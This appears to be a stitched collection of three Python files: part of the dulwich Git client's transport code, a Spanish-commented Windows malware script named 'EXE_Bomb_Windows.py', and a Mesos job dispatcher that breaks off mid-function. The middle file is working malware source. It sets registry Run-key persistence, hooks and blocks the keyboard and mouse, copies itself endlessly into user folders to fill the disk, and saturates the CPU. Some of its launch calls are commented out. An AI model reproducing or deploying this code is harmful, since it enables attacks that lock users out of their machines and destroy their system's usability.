proto, negotiated_capabilities, graph_walker, pack_data, progress)
return refs
def archive(self, path, committish, write_data, progress=None,
write_error=None):
proto, can_read = self._connect(b'upload-archive', path)
with proto:
proto.write_pkt_line("argument %s" % committish)
proto.write_pkt_line(None)
pkt = proto.read_pkt_line()
if pkt == "NACK\n":
return
elif pkt == "ACK\n":
pass
elif pkt.startswith("ERR "):
raise GitProtocolError(pkt[4:].rstrip("\n"))
else:
raise AssertionError("invalid response %r" % pkt)
ret = proto.read_pkt_line()
if ret is not None:
raise AssertionError("expected pkt tail")
self._read_side_band64k_data(proto, {
1: write_data, 2: progress, 3: write_error})
class TCPGitClient(TraditionalGitClient):
"""A Git Client that works over TCP directly (i.e. git://)."""
def __init__(self, host, port=None, *args, **kwargs):
if port is None:
port = TCP_GIT_PORT
self._host = host
self._port = port
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, cmd, path):
sockaddrs = socket.getaddrinfo(
self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM)
s = None
err = socket.error("no address found for %s" % self._host)
for (family, socktype, proto, canonname, sockaddr) in sockaddrs:
s = socket.socket(family, socktype, proto)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
s.connect(sockaddr)
break
except socket.error as err:
if s is not None:
s.close()
s = None
if s is None:
raise err
# -1 means system default buffering
rfile = s.makefile('rb', -1)
# 0 means unbuffered
wfile = s.makefile('wb', 0)
def close():
rfile.close()
wfile.close()
s.close()
proto = Protocol(rfile.read, wfile.write, close,
report_activity=self._report_activity)
if path.startswith("/~"):
path = path[1:]
proto.send_cmd('git-%s' % cmd, path, 'host=%s' % self._host)
return proto, lambda: _fileno_can_read(s)
class SubprocessWrapper(object):
"""A socket-like object that talks to a subprocess via pipes."""
def __init__(self, proc):
self.proc = proc
self.read = proc.stdout.read
self.write = proc.stdin.write
def can_read(self):
if subprocess.mswindows:
from msvcrt import get_osfhandle
from win32pipe import PeekNamedPipe
handle = get_osfhandle(self.proc.stdout.fileno())
return PeekNamedPipe(handle, 0)[2] != 0
else:
return _fileno_can_read(self.proc.stdout.fileno())
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
self.proc.wait()
class SubprocessGitClient(TraditionalGitClient):
"""Git client that talks to a server using a subprocess."""
def __init__(self, *args, **kwargs):
self._connection = None
self._stderr = None
self._stderr = kwargs.get('stderr')
if 'stderr' in kwargs:
del kwargs['stderr']
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, service, path):
import subprocess
argv = ['git', service, path]
p = SubprocessWrapper(
subprocess.Popen(argv, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._stderr))
return Protocol(p.read, p.write, p.close,
report_activity=self._report_activity), p.can_read
class LocalGitClient(GitClient):
"""Git Client that just uses a local Repo."""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new LocalGitClient instance.
:param path: Path to the local repository
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
# Ignore the thin_packs argument
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
from dulwich.repo import Repo
r = Repo(path)
return r.fetch(target, determine_wants=determine_wants,
progress=progress)
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
from dulwich.repo import Repo
r = Repo(path)
objects_iter = r.fetch_objects(determine_wants, graph_walker, progress)
# Did the process short-circuit (e.g. in a stateless RPC call)? Note
# that the client still expects a 0-object pack in most cases.
if objects_iter is None:
return
write_pack_objects(ProtocolFile(None, pack_data), objects_iter)
# What Git client to use for local access
default_local_git_client_cls = SubprocessGitClient
class SSHVendor(object):
"""A client side SSH implementation."""
def connect_ssh(self, host, command, username=None, port=None):
import warnings
warnings.warn(
"SSHVendor.connect_ssh has been renamed to SSHVendor.run_command",
DeprecationWarning)
return self.run_command(host, command, username=username, port=port)
def run_command(self, host, command, username=None, port=None):
"""Connect to an SSH server.
Run a command remotely and return a file-like object for interaction
with the remote command.
:param host: Host name
:param command: Command to run
:param username: Optional ame of user to log in as
:param port: Optional SSH port to use
"""
raise NotImplementedError(self.run_command)
class SubprocessSSHVendor(SSHVendor):
"""SSH vendor that shells out to the local 'ssh' command."""
def run_command(self, host, command, username=None, port=None):
import subprocess
#FIXME: This has no way to deal with passwords..
args = ['ssh', '-x']
if port is not None:
args.extend(['-p', str(port)])
if username is not None:
host = '%s@%s' % (username, host)
args.append(host)
proc = subprocess.Popen(args + command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
return SubprocessWrapper(proc)
try:
import paramiko
except ImportError:
pass
else:
import threading
class ParamikoWrapper(object):
STDERR_READ_N = 2048 # 2k
def __init__(self, client, channel, progress_stderr=None):
self.client = client
self.channel = channel
self.progress_stderr = progress_stderr
self.should_monitor = bool(progress_stderr) or True
self.monitor_thread = None
self.stderr = ''
# Channel must block
self.channel.setblocking(True)
# Start
if self.should_monitor:
self.monitor_thread = threading.Thread(
target=self.monitor_stderr)
self.monitor_thread.start()
def monitor_stderr(self):
while self.should_monitor:
# Block and read
data = self.read_stderr(self.STDERR_READ_N)
# Socket closed
if not data:
self.should_monitor = False
break
# Emit data
if self.progress_stderr:
self.progress_stderr(data)
# Append to buffer
self.stderr += data
def stop_monitoring(self):
# Stop StdErr thread
if self.should_monitor:
self.should_monitor = False
self.monitor_thread.join()
# Get left over data
data = self.channel.in_stderr_buffer.empty()
self.stderr += data
def can_read(self):
return self.channel.recv_ready()
def write(self, data):
return self.channel.sendall(data)
def read_stderr(self, n):
return self.channel.recv_stderr(n)
def read(self, n=None):
data = self.channel.recv(n)
data_len = len(data)
# Closed socket
if not data:
return
# Read more if needed
if n and data_len < n:
diff_len = n - data_len
return data + self.read(diff_len)
return data
def close(self):
self.channel.close()
self.stop_monitoring()
class ParamikoSSHVendor(object):
def __init__(self):
self.ssh_kwargs = {}
def run_command(self, host, command, username=None, port=None,
progress_stderr=None):
# Paramiko needs an explicit port. None is not valid
if port is None:
port = 22
client = paramiko.SSHClient()
policy = paramiko.client.MissingHostKeyPolicy()
client.set_missing_host_key_policy(policy)
client.connect(host, username=username, port=port,
**self.ssh_kwargs)
# Open SSH session
channel = client.get_transport().open_session()
# Run commands
channel.exec_command(*command)
return ParamikoWrapper(
client, channel, progress_stderr=progress_stderr)
# Can be overridden by users
get_ssh_vendor = SubprocessSSHVendor
class SSHGitClient(TraditionalGitClient):
def __init__(self, host, port=None, username=None, *args, **kwargs):
self.host = host
self.port = port
self.username = username
TraditionalGitClient.__init__(self, *args, **kwargs)
self.alternative_paths = {}
def _get_cmd_path(self, cmd):
return self.alternative_paths.get(cmd, 'git-%s' % cmd)
def _connect(self, cmd, path):
if path.startswith("/~"):
path = path[1:]
con = get_ssh_vendor().run_command(
self.host, ["%s '%s'" % (self._get_cmd_path(cmd), path)],
port=self.port, username=self.username)
return (Protocol(con.read, con.write, con.close,
report_activity=self._report_activity),
con.can_read)
def default_user_agent_string():
return "dulwich/%s" % ".".join([str(x) for x in dulwich.__version__])
def default_urllib2_opener(config):
if config is not None:
proxy_server = config.get("http", "proxy")
else:
proxy_server = None
handlers = []
if proxy_server is not None:
handlers.append(urllib2.ProxyHandler({"http": proxy_server}))
opener = urllib2.build_opener(*handlers)
if config is not None:
user_agent = config.get("http", "useragent")
else:
user_agent = None
if user_agent is None:
user_agent = default_user_agent_string()
opener.addheaders = [('User-agent', user_agent)]
return opener
class HttpGitClient(GitClient):
def __init__(self, base_url, dumb=None, opener=None, config=None, *args,
**kwargs):
self.base_url = base_url.rstrip("/") + "/"
self.dumb = dumb
if opener is None:
self.opener = default_urllib2_opener(config)
else:
self.opener = opener
GitClient.__init__(self, *args, **kwargs)
def _get_url(self, path):
return urlparse.urljoin(self.base_url, path).rstrip("/") + "/"
def _http_request(self, url, headers={}, data=None):
req = urllib2.Request(url, headers=headers, data=data)
try:
resp = self.opener.open(req)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotGitRepository()
if e.code != 200:
raise GitProtocolError("unexpected http response %d" % e.code)
return resp
def _discover_references(self, service, url):
assert url[-1] == "/"
url = urlparse.urljoin(url, "info/refs")
headers = {}
if self.dumb is not False:
url += "?service=%s" % service
headers["Content-Type"] = "application/x-%s-request" % service
resp = self._http_request(url, headers)
try:
self.dumb = (not resp.info().gettype().startswith("application/x-git-"))
if not self.dumb:
proto = Protocol(resp.read, None)
# The first line should mention the service
pkts = list(proto.read_pkt_seq())
if pkts != [('# service=%s\n' % service)]:
raise GitProtocolError(
"unexpected first line %r from smart server" % pkts)
return read_pkt_refs(proto)
else:
return read_info_refs(resp), set()
finally:
resp.close()
def _smart_request(self, service, url, data):
assert url[-1] == "/"
url = urlparse.urljoin(url, service)
headers = {"Content-Type": "application/x-%s-request" % service}
resp = self._http_request(url, headers, data)
if resp.info().gettype() != ("application/x-%s-result" % service):
raise GitProtocolError("Invalid content-type from server: %s"
% resp.info().gettype())
return resp
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
url = self._get_url(path)
old_refs, server_capabilities = self._discover_references(
"git-receive-pack", url)
negotiated_capabilities = self._send_capabilities & server_capabilities
if 'report-status' in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
new_refs = determine_wants(dict(old_refs))
if new_refs is None:
return old_refs
if self.dumb:
raise NotImplementedError(self.fetch_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
(have, want) = self._handle_receive_pack_head(
req_proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
entries, sha = write_pack_objects(req_proto.write_file(), objects)
resp = self._smart_request("git-receive-pack", url,
data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_receive_pack_tail(resp_proto, negotiated_capabilities,
progress)
return new_refs
finally:
resp.close()
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
:return: Dictionary with the refs of the remote repository
"""
url = self._get_url(path)
refs, server_capabilities = self._discover_references(
"git-upload-pack", url)
negotiated_capabilities = self._fetch_capabilities & server_capabilities
wants = determine_wants(refs)
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
return refs
if self.dumb:
raise NotImplementedError(self.send_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
self._handle_upload_pack_head(
req_proto, negotiated_capabilities, graph_walker, wants,
lambda: False)
resp = self._smart_request(
"git-upload-pack", url, data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_upload_pack_tail(resp_proto, negotiated_capabilities,
graph_walker, pack_data, progress)
return refs
finally:
resp.close()
def get_transport_and_path_from_url(url, config=None, **kwargs):
"""Obtain a git client from a URL.
:param url: URL to open
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
parsed = urlparse.urlparse(url)
if parsed.scheme == 'git':
return (TCPGitClient(parsed.hostname, port=parsed.port, **kwargs),
parsed.path)
elif parsed.scheme == 'git+ssh':
path = parsed.path
if path.startswith('/'):
path = parsed.path[1:]
return SSHGitClient(parsed.hostname, port=parsed.port,
username=parsed.username, **kwargs), path
elif parsed.scheme in ('http', 'https'):
return HttpGitClient(urlparse.urlunparse(parsed), config=config,
**kwargs), parsed.path
elif parsed.scheme == 'file':
return default_local_git_client_cls(**kwargs), parsed.path
raise ValueError("unknown scheme '%s'" % parsed.scheme)
def get_transport_and_path(location, **kwargs):
"""Obtain a git client from a URL.
:param location: URL or path
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
# First, try to parse it as a URL
try:
return get_transport_and_path_from_url(location, **kwargs)
except ValueError:
pass
if ':' in location and not '@' in location:
# SSH with no user@, zero or one leading slash.
(hostname, path) = location.split(':')
return SSHGitClient(hostname, **kwargs), path
elif '@' in location and ':' in location:
# SSH with user@host:foo.
user_host, path = location.split(':')
user, host = user_host.rsplit('@')
return SSHGitClient(host, username=user, **kwargs), path
# Otherwise, assume it's a local path.
return default_local_git_client_cls(**kwargs), location
|
EXE_Bomb_Windows.py
|
# v1.0
from pynput.mouse import Button, Controller # Importa librería Mouse
import pythoncom, pyHook
from winreg import *
import os
from getpass import getuser
from multiprocessing import Process
import threading
import shutil
import string
import random
def addStartup(): # function = Iniciar automaticamente
path = r"C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\EXE_Bomb_Windows.exe" # Path del Software completo
name = "EXE_Bomb_Windows" # Nombre del StartUp
keyVal = r'Software\Microsoft\Windows\CurrentVersion\Run' # Path del registro
def verificar(): # Evita que se créen 2 veces el Bom
try: # Intenta crear la dirección
os.makedirs('C:\\Users\\Public\\EXEBombWindows\\BoomRUN')
return True # Se creó la carpeta
except:
return False# La carpeta ya existe
try: # Solo si tiene permisos de administrador
registry = OpenKey(HKEY_LOCAL_MACHINE, keyVal, 0, KEY_ALL_ACCESS) # machine
SetValueEx(registry,name, 0, REG_SZ, path)
verificar() # Crea Carpeta
except: # Si no tien permisos de administrador
if (verificar()):
registry = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) # local
SetValueEx(registry,name, 0, REG_SZ, path)
def Block(): # Lib [KeyandMouse_Block]
mouse = Controller()
def BlockMouse():
mouse.position = (0, 0) # el mouse se va a la posición 0,0 de la pantalla
#mouse.press(Button.right)
#mouse.release(Button.right)
mouse.press(Button.left)
mouse.release(Button.left)
k = pyHook.HookManager()
while(True):
def e(event):
return False
BlockMouse() # Bloquea el mouse
k.KeyAll = e
k.HookKeyboard()
pythoncom.PumpMessages() # Bloquea Teclado
def CreateFileMain(): # Crea carpeta que contiene el virus
try: # Intenta crear la dirección
os.makedirs('C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres')
return True
except:
return False
pass
def AutoCopy(): # Se replcia en el sistema, (Satura la Unidad:C)
def random_char(y):
return ''.join(random.choice(string.ascii_letters) for x in range(y))
nameKey = "EXE_Bomb_Windows" # Nombre del virus
user = str(getuser())
path = "C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\"+nameKey+".exe" # Segunda iniciada, esto debe existir
can = 64 # Números de caracteres del nombre del virus
documentos = 'C:\\Users\\'+user+'\\Documents'
music = 'C:\\Users\\'+user+'\\Music'
video = 'C:\\Users\\'+user+'\\Videos'
picture = 'C:\\Users\\'+user+'\\Pictures'
download = 'C:\\Users\\'+user+'\\Downloads'
roaming = 'C:\\Users\\'+user+'\\AppData\\Roaming\\VirusBomb'
locallow = 'C:\\Users\\'+user+'\\AppData\\LocalLow\\VirusBomb'
local = 'C:\\Users\\'+user+'\\AppData\\Local\\VirusBomb'
def CreateFolder():
try: # Intenta crear la dirección
os.makedirs(documentos)
except:
pass
try: # Intenta crear la dirección
os.makedirs(music)
except:
pass
try: # Intenta crear la dirección
os.makedirs(video)
except:
pass
try: # Intenta crear la dirección
os.makedirs(picture)
except:
pass
try: # Intenta crear la dirección
os.makedirs(download)
except:
pass
try: # Intenta crear la dirección
os.makedirs(roaming)
except:
pass
try: # Intenta crear la dirección
os.makedirs(locallow)
except:
pass
try: # Intenta crear la dirección
os.makedirs(local)
except:
pass
def CopyDoc():
try:
shutil.copy(path, documentos+"\\"+random_char(can)+".exe")
except:
pass
def CopyMus():
try:
shutil.copy(path, music+"\\"+random_char(can)+".exe")
except:
pass
def CopyVic():
try:
shutil.copy(path, video+"\\"+random_char(can)+".exe")
except:
pass
def CopyPic():
try:
shutil.copy(path, picture+"\\"+random_char(can)+".exe")
except:
pass
def CopyDow():
try:
shutil.copy(path, download +"\\"+random_char(can)+".exe")
except:
pass
def CopyRoa():
try:
shutil.copy(path, roaming+"\\"+random_char(can)+".exe")
except:
pass
def CopyLocL():
try:
shutil.copy(path, locallow +"\\"+random_char(can)+".exe")
except:
pass
def CopyLoc():
try:
shutil.copy(path, local+"\\"+random_char(can)+".exe")
except:
pass
#inicia Hilo
CreateFolder()
while(True):
CopyDoc()
CopyMus()
CopyVic()
CopyPic()
CopyDow()
CopyRoa()
CopyLocL()
CopyLoc()
def CPU():
def sature():
n1 = (random.randrange(98798498456498889)/random.randrange(15))
n2 = (random.randrange(98798498456498889)+random.randrange(64165143651651))
n3 = (random.randrange(98798498456498889)*random.randrange(999))
n4 = (random.randrange(98798498456498889)*random.randrange(453))
n5 = (random.randrange(98798498456498889)-random.randrange(453453453453453453))
n6 = (random.randrange(98798498456498889)*random.randrange(1435))
n7 = (random.randrange(98798498456498889)*random.randrange(4534))
n8 = (random.randrange(98798498456498889)-random.randrange(45345453453453453))
n9 = (random.randrange(98798498456498889)*random.randrange(154345))
n10 = (random.randrange(98798498456498889)*random.randrange(4354345345345))
while(True):
try:
while(True):
sature()
except:
pass
if __name__ == '__main__':
if (CreateFileMain()): # Se ejecuta en el primer inicio
nameKey = "EXE_Bomb_Windows.exe"
filePath = "C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\"+ nameKey
try:
with open(filePath, 'r') as f: # Verifica el virus se encuentra oculto en el sistema
print("El virus existe")
except : #Replica
print("No se encuentra en la carpeta, replicando...")
try:
shutil.copy(nameKey , filePath) # Intenta ocultar el virus en una carpeta
print("Se replicó exitosamente")
except:
print("Replica fallida")
# Autoinicia en registro
addStartup()
print("se creó la carpeta y startup exitoso, virus deshabilitado")
exit()
else: # Solo se ejecuta si la PC ya está infectada
block = threading.Thread(target=Block) # Bloquea Teclado y mouse
#block.start() # Bloquea teclado y mouse
while(True):
autocopy = Process(target=AutoCopy) # Copia y replica el virus en muchas carpetas del usuario
cpuS = Process(target=CPU)
#cpuS.start()
#autocopy.start() # Saturación del disco duro
|
dispatcher.py
|
# scheduler.dispatcher: Scheduler logic for matching resource offers to job requests.
import os
import sys
import math
import time
from threading import Thread, Event
import socket
from collections import deque, OrderedDict
from common import *
from core import *
from mesosutils import *
import db
#from protobuf_to_dict import protobuf_to_dict
import json
import mesos.interface
from mesos.interface import mesos_pb2
import mesos.native
import logging
DEFAULT_MEM = 4 * 1024
OFFER_HOLD = 5
heartBeat = Event()
class Dispatcher(mesos.interface.Scheduler):
def __init__(self, master, webaddr, daemon=True):
self.mesosmaster = master # Mesos Master (e.g. zk://host1:2181,host2:2181/mesos)
self.webaddr = webaddr
self.pending = deque() # Pending jobs. First job is popped once there are enough resources available to launch it.
self.active = {} # Active jobs keyed on jobId.
self.finished = {} # Finished jobs keyed on jobId.
self.offers = {} # Offers from Mesos keyed on offerId. We assume they are valid until they are rescinded by Mesos.
self.jobsCreated = 0 # Total number of jobs created for generating job ids.
self.daemon = daemon # Run as a daemon (or finish when there are no more pending/active jobs)
self.connected = False
self.terminate = False # Flag to signal termination to the owner of the dispatcher
self.frameworkId = None # Will get updated when registering with Master
self.idle = 0
self.gc = time.time()
self.offerRelease = 0
self.currentDir = 1 # 1 or -1. Choose from beginning or end of port range
self.offerHold = {}
logging.info("[DISPATCHER] Initializing with master at %s" % master)
def submit(self, job):
logging.info("[DISPATCHER] Received new Job for Application %s, Job ID= %d" % (job.appName, job.jobId))
self.pending.append(job)
def getActiveJobs(self):
return self.active
def getFinishedJobs(self):
return self.finished
def getJob(self, jobId):
if jobId in self.active:
return self.active[jobId]
if jobId in self.finished:
return self.finished[jobId]
return None
def fullId(self, jobId, taskId):
return "%d.%d" % (jobId, taskId)
def jobId(self, fullid):
s = fullid.split(".")
return int(s[0])
def taskId(self, fullid):
s = fullid.split(".")
return int(s[1].strip())
def getTask(self, fullid):
jobId = self.jobId(fullid)
tid = self.taskId(fullid)
job = self.active[jobId]
for t in job.tasks:
if t.taskid == tid:
return t
return None
def tryTerminate(self):
if not self.daemon and len(self.pending) == 0 and len(self.active) == 0:
self.terminate = True
logging.info("[DISPATCHER] Terminating")
def allocateResources(self, nextJob): #, driver):
committedResources = {}
availableCPU = {i: float(getResource(o.resources, "cpus")) for i, o in self.offers.items()}
availableMEM = {i: getResource(o.resources, "mem") for i, o in self.offers.items()}
availablePorts = {i: PortList(getResource(o.resources, "ports"), dir=self.currentDir) for i, o in self.offers.items()}
committed = {i: False for i in self.offers}
# Try to satisy each role, sequentially
for roleId in nextJob.roles.keys():
unassignedPeers = nextJob.roles[roleId].peers
committedResources[roleId] = {}
logging.debug("Trying to fill role, %s", roleId)
for offerId, offer in self.offers.items():
if committed[offerId]:
logging.debug(" Offer from %s, but it is already committed", offer.hostname)
continue
if availableMEM[offerId] == None or availableMEM[offerId] == 0:
logging.debug(" Offer from %s has NO MEM", offer.hostname)
continue
if availableCPU[offerId] == 0:
logging.debug(" Offer from %s has NO CPU", offer.hostname)
continue
# Check Hostmask requirement
hostmask = nextJob.roles[roleId].hostmask
host = self.offers[offerId].hostname.encode('utf8','ignore')
r = re.compile(hostmask)
if not r.match(host):
logging.debug(" Offer from %s does not match hostmask %s. DECLINING offer" % (host, hostmask))
continue
logging.debug("Offer %s MATCHES hostmask %s. Checking offer against role requirements" % (host, hostmask))
# Allocate CPU Resource
cpuPerPeer = nextJob.roles[roleId].params.get('cpu', 1)
requestedCPU = min(unassignedPeers * cpuPerPeer, availableCPU[offerId])
requestedPeers = int(math.floor(requestedCPU / cpuPerPeer))
if 'peers_per_host' in nextJob.roles[roleId].params:
explicitPeerRequest = nextJob.roles[roleId].params['peers_per_host']
explicitCPURequest = explicitPeerRequest * cpuPerPeer
if explicitCPURequest > availableCPU[offerId]:
# Cannot satisfy specific peers-to-host requirement
continue
else:
requestedCPU = explicitCPURequest
requestedPeers = explicitPeerRequest
# Allocate Memory Resource
requestedMEM = availableMEM[offerId]
if 'mem' in nextJob.roles[roleId].params:
memPolicy = nextJob.roles[roleId].params['mem']
if memPolicy == 'some':
requestedMEM = min(DEFAULT_MEM, availableMEM[offerId]/4)
elif memPolicy == 'all':
pass
elif str(memPolicy).isdigit():
requestedMEM = memPolicy * 1024
if requestedMEM > availableMEM[offerId]:
# Cannot satisfy user's memory request
continue
# Commit Resources for this offer with this role
committedResources[roleId][offerId] = {}
# NO LONGER Assumes a 1:1 Peer:CPU ratio or ALL MEM
committedResources[roleId][offerId]['cpus'] = requestedCPU
committedResources[roleId][offerId]['peers'] = requestedPeers #requestedCPU / assignedPeersInRole
unassignedPeers -= requestedPeers #assignedPeersInRole #requestedCPU
availableCPU[offerId] -= requestedCPU
committedResources[roleId][offerId]['mem'] = requestedMEM
availableMEM[offerId] -= requestedMEM
committedResources[roleId][offerId]['ports'] = availablePorts[offerId]
# Check if this offer is fully committed or not
if availableCPU[offerId] == 0 or availableMEM[offerId] == 0:
committed[offerId] = True
logging.debug(" Remaining resources on %s: CPU=%d MEM=%d", host, availableCPU[offerId], availableMEM[offerId])
logging.debug(" UNASSIGNED PEERS for Role `%s` = %d", roleId, unassignedPeers)
if unassignedPeers <= 0:
# All peers for this role have been assigned
break
if unassignedPeers > 0:
# Could not commit all peers for this role with current set of offers
logging.warning("Failed to satisfy role %s. Left with %d unassigned Peers" % (roleId, unassignedPeers))
return None
return committedResources
# See if the next job in the pending queue can be launched using the current offers.
# Upon failure, return None. Otherwise, return the Job object with fresh k3 tasks attached to it
def prepareNextJob(self):
logging.info("[DISPATCHER] Attempting to prepare the next pending job. Currently have %d offers" % len (self.offers))
if len(self.pending) == 0:
logging.info("[DISPATCHER] No pending jobs to prepare")
return None
index = 0
nextJob = self.pending[0]
reservation = self.allocateResources(nextJob)
# If no resources were allocated and jobs are waiting, try to launch each in succession
while nextJob and reservation == None:
index += 1
if index >= len(self.pending):
logging.info ("[DISPATCHER] No jobs in the queue can run with current offers")
return None
nextJob = self.pending[index]
reservation = self.allocateResources(nextJob)
# Iterate through the reservations for each role / offer: create peers & tasks
allPeers = []
for roleId, role in reservation.items():
logging.debug("[DISPATCHER] Preparing role, %s" % roleId)
defaultVars = nextJob.roles[roleId].variables
peerVars = nextJob.roles[roleId].getPeerVarIter()
# Sort offers for this role by hostname, to ensure deterministic allocation of resources:
offersheet = OrderedDict(sorted(role.items(), key=lambda r: self.offers[r[0]].hostname))
for offerId, offer in offersheet.items():
peers = []
host = self.offers[offerId].hostname.encode('utf8','ignore')
ip = socket.gethostbyname(host)
if len(allPeers) == 0:
nextJob.master = host
for n in range(offer['peers']):
nextPort = offer['ports'].getNext()
# CHECK: Switched to hostnames
try:
vars = peerVars.next()
except StopIteration:
vars = defaultVars
p = Peer(len(allPeers), vars, ip, nextPort)
peers.append(p)
allPeers.append(p)
taskid = len(nextJob.tasks)
t = Task(taskid, offerId, host, offer['mem'], peers, roleId)
nextJob.tasks.append(t)
logging.debug("PEER LIST:")
for p in peers:
logging.debug(" %-2s %s:%s" % (p.index, p.ip, p.port))
# ID Master for collection Stdout TODO: Should we auto-default to offer 0 for stdout?
populateAutoVars(allPeers)
nextJob.all_peers = allPeers
del self.pending[index] #.popleft()
return nextJob
def launchJob(self, nextJob, driver):
#jobId = self.genJobId()
#logging.info("[DISPATCHER] Waiting for resources to settle...")
#time.sleep(60)
logging.info("[DISPATCHER] Launching job %d" % nextJob.jobId)
self.active[nextJob.jobId] = nextJob
self.jobsCreated += 1
self.currentDir *= -1
nextJob.status = "RUNNING"
nextJob.start_ts = time.time()
db.updateJob(nextJob.jobId, status=nextJob.status)
# Group tasks by offer
offerTasks = {}
for taskNum, k3task in enumerate(nextJob.tasks):
if k3task.offerid not in offerTasks:
offerTasks[k3task.offerid] = []
task = taskInfo(nextJob, taskNum, self.webaddr, self.offers[k3task.offerid].slave_id)
offerTasks[k3task.offerid].append(task)
# Build Mesos TaskInfo Protobufs for each k3 task and launch them through the driver
# for taskNum, k3task in enumerate(nextJob.tasks):
# logging.debug (" OFFER ID ========> " + k3task.offerid)
# task = taskInfo(nextJob, taskNum, self.webaddr, self.offers[k3task.offerid].slave_id)
for offerid, tasklist in offerTasks.items():
oid = mesos_pb2.OfferID()
oid.value = offerid
driver.launchTasks(oid, tasklist)
# Stop considering the offer, since we just used it.
del self.offers[offerid]
# # Decline all remaining offers
logging.info("[DISPATCHER] DECLINING remaining offers (Task Launched)")
for oid, offer in self.offers.items():
driver.declineOffer(offer.id)
for oid in self.offers.keys():
del self.offers[oid]
def cancelJob(self, jobId, driver):
logging.warning("[DISPATCHER] Asked to cancel job %d. Killing all tasks" % jobId)
job = self.active[jobId]
job.status = "FAILED"
db.updateJob(jobId, status=job.status, done=True)
for t in job.tasks:
t.status = "TASK_FAILED"
fullid = self.fullId(jobId, t.taskid)
tid = mesos_pb2.TaskID()
tid.value = fullid
logging.warning("[DISPATCHER] Killing task: " + fullid)
driver.killTask(tid)
del self.active[jobId]
self.finished[jobId] = job
# self.tryTerminate()
def getSandboxURL(self, jobId=None):
# For now, return Mesos URL to Framework:
master = resolve(self.mesosmaster).strip()
url = master + '/#/frameworks/' + self.frameworkId.value
return url
def taskFinished(self, fullid):
jobId = self.jobId(fullid)
job = self.active[jobId]
runningTasks = False
for t in job.tasks:
if t.taskid == self.taskId(fullid):
t.status = "TASK_FINISHED"
if t.status != "TASK_FINISHED":
runningTasks = True
# If all tasks are finished, clean up the job
if not runningTasks:
logging.info("[DISPATCHER] All tasks finished for job %d" % jobId)
# TODO Move the job to a finished job list
job = self.active[jobId]
job.status = "FINISHED"
db.updateJob(jobId, status=job.status, done=True)
del self.active[jobId]
self.finished[jobId] = job
self.tryTerminate()
# --- Mesos Callbacks ---
def registered(self, driver, frameworkId, masterInfo):
logging.info ("[DISPATCHER] Registered with framework ID %s" % frameworkId.value)
self.connected = True
self.frameworkId = frameworkId
self.driver = driver
def statusUpdate(self, driver, update):
s = update.task_id.value.encode('utf8','ignore')
jobId = self.jobId(update.task_id.value)
if jobId not in self.active:
logging.warning("[DISPATCHER] Received a status update for an old job: %d" % jobId)
return
k3task = self.getTask(s)
host = k3task.host
state = mesos_pb2.TaskState.Name(update.state)
logging.info ("[TASK UPDATE] TaskID %s on host %s. Status: %s [%s]"% (update.task_id.value, host, state, update.data))
# TODO: Check STDOUT flag, capture stream in update.data, & append to appropriate file
# will need to update executor and ensure final output archive doesn't overwrite
# if update.state == mesos_pb2.TASK_RUNNING and self.active[jobId].stdout:
# stdout =
# if not os.path.exists(????):
# os.mkdir(???)
# with open(os.path.join(self.job.path, 'output'), 'a') as out:
# out.write(update.data)
if update.state == mesos_pb2.TASK_KILLED or \
update.state == mesos_pb2.TASK_FAILED or \
update.state == mesos_pb2.TASK_LOST:
jobId = self.jobId(update.task_id.value)
